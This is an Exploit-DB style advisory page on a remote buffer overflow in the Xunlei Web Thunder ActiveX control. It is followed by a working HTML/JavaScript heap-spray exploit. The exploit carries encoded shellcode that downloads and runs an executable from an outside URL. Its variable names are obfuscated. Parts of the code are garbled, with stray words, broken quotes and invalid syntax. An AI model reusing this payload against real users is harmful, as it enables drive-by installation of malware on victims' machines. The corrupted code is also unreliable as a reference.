Remote buffer-overflow vulnerability in Xunlei Web Thunder

vendor:

Web Thunder

by:

Unknown

7.5

CVSS

HIGH

Buffer-Overflow

119

CWE

Product Name: Web Thunder

Affected Version From: 5.6.8.344

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

Remote buffer-overflow vulnerability in Xunlei Web Thunder

The application fails to perform adequate boundary-checks on user-supplied data, leading to a remote buffer-overflow vulnerability. An attacker can exploit this vulnerability by tricking users into visiting a maliciously crafted webpage. Successful exploitation allows the attacker to execute arbitrary code within the context of the application using the ActiveX control, typically in Microsoft Internet Explorer. Failed exploit attempts result in a denial-of-service condition.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25751/info

Xunlei Web Thunder is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.

An attacker may exploit this issue by enticing victims into visiting a maliciously crafted webpage.

Successfully exploiting this issue will allow the attacker to execute arbitrary code within the context of the application using the ActiveX control (typically Microsoft Internet Explorer). Failed exploit attempts will result in a denial-of-service condition.

This issue affects Xunlei Web Thunder 5.6.8.344; other versions may also be affected.

 <OBJECT id=target classid=clsid: EEDD6FF9-13DE-496B-9A1C-D78B3215E266></OBJECT>  
 <SCRIPT language=javascript>  
  var she132132132132llc13ode = unescape (“%u9090 " + " %u9090 " +    
 “%uefe9%u0000%u5a00%ua164%u0030%u0000%u408b%u8b0c” +   
 “%u1c70%u8bad%u0840%ud88b%u738b%u8b3c%u1e74%u0378” +   
 “%u8bf3%u207e%ufb03%u4e8b%u3314%u56ed%u5157%u3f8b” +   
 “%ufb03%uf28b%u0e6a%uf359%u74a6%u5908%u835f%u04c7” +   
 “%ue245%u59e9%u5e5f%ucd8b%u468b%u0324%ud1c3%u03e1” +   
 “%u33c1%u66c9%u088b%u468b%u031c%uc1c3%u02e1%uc103” +   
 “%u008b%uc303%ufa8b%uf78b%uc683%u8b0e%u6ad0%u5904” +   
 “%u6ae8%u0000%u8300%u0dc6%u5652%u57ff%u5afc%ud88b” +   
 “%u016a%ue859%u0057%u0000%uc683%u5613%u8046%u803e” +   
 “%ufa75%u3680%u5e80%uec83%u8b40%uc7dc%u6303%u646d” +   
 “%u4320%u4343%u6643%u03c7%u632f%u4343%u03c6%u4320” +   
 “%u206a%uff53%uec57%u04c7%u5c03%u2e61%uc765%u0344” +   
 “%u7804%u0065%u3300%u50c0%u5350%u5056%u57ff%u8bfc” +   
 “%u6adc%u5300%u57ff%u68f0%u2451%u0040%uff58%u33d0” +   
 “%uacc0%uc085%uf975%u5251%u5356%ud2ff%u595a%ue2ab” +   
 “%u33ee%uc3c0%u0ce8%uffff%u47ff%u7465%u7250%u636f” +   
 “%u6441%u7264%u7365%u0073%u6547%u5374%u7379%u6574” +   
 “%u446d%u7269%u6365%u6f74%u7972%u0041%u6957%u456e” +   
 “%u6578%u0063%u7845%u7469%u6854%u6572%u6461%u4c00” +   
 “%u616f%u4c64%u6269%u6172%u7972%u0041%u7275%u6d6c” +   
 “%u6e6f%u5500%u4c52%u6f44%u6e77%u6f6c%u6461%u6f54” +   
 “%u6946%u656c%u0041 " +   
 “%u7468%u7074%u2f3a%u312f%u3176%u6e2e%u6d61%u2f65%u6573%u7672%u7265%u652e%u6578%u0000”); /这 village right watching snow 按 钮 breaking 专 house   
 var IsNop1236326312 = '';   
 var bi3123g123665blo2131ck = unescape (“%u9090%u9090”);   
 var IsNop1236326312 = '';   
 var he132132aders123132ize = 20;   
 var IsNop1236326312 = '';   
 var sl21123112ack312231312space = he132132aders123132ize+she132132132132llc13ode.length;   
 var IsNop1236326312 = '';   
 while (bi3123g123665blo2131ck.length<sl21123112ack312231312space) bi3123g123665blo2131ck+=bi3123g123665blo2131ck;   
 fillblock = bi3123g123665blo2131ck.substring (0, sl21123112ack312231312space);   
 block = bi3123g123665blo2131ck.substring (0, bi3123g123665blo2131ck.length-sl21123112ack312231312space);   
 while (block.length+sl21123112ack312231312space<0x40000) blockblock = block+block+fillblock;   
 memory = new Array ();   
 for (x=0; x<300; x++) memory [x] = block + she132132132132llc13ode;   
 var b1u1231ff312er = '';   
 var IsNop1236326312 = '';   
 var IsNop1236326312 = '';   
 while (b1u1231ff312er.length < 4057) b1u1231ff312er+= " \ x0a \ x0a \ x0a \ x0a ";   
 b1u1231ff312er+= " \ x0a ";   
 b1u1231ff312er+= " \ x0a ";   
 b1u1231ff312er+= " \ x0a ";   
 b1u1231ff312er+= " \ x0a \ x0a \ x0a \ x0a ";   
 b1u1231ff312er+= " \ x0a \ x0a \ x0a \ x0a ";    
 var yes= " 1111 ";   
 target.DownURL2 (b1u1231ff312er, yes, yes and yes);   
 var IsNop1236326312 = '';   
   
 </SCRIPT>  
   
 <body oncontextmenu= " return false " onselectstart= " return false " ondragstart= " return false " >